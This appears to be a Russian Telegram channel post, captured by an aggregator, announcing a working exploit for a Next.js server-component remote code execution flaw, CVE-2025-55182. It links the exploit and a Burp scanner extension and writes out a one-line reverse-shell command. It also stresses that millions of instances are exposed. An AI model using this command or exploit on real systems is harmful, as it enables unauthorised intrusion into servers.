К
Канал ламера
@hackcrap373 подп.
268просмотров
71.8%от подписчиков
10 декабря 2025 г.
📷 ФотоScore: 295
Рабочий эксплоит Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам. Получить шелл в одну команду можно так python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234 Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает). Сейчас в интернете находится 8.7 миллионов потенциально уязвимых инстансов, — 69% всех облачных сред используют Next.js — это каждый второй прод в облаке. Чтобы не проверять их все вручную, для Burp написали готовое расширение, которое проверяет уязвимость в фоне https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension (в active scan++ тоже добавили)
268
просмотров
808
символов
Нет
эмодзи
Да
медиа

Другие посты @hackcrap

Все посты канала →
Рабочий эксплоит Спустя сутки после тряски с нейрослопом, ег — @hackcrap | PostSniper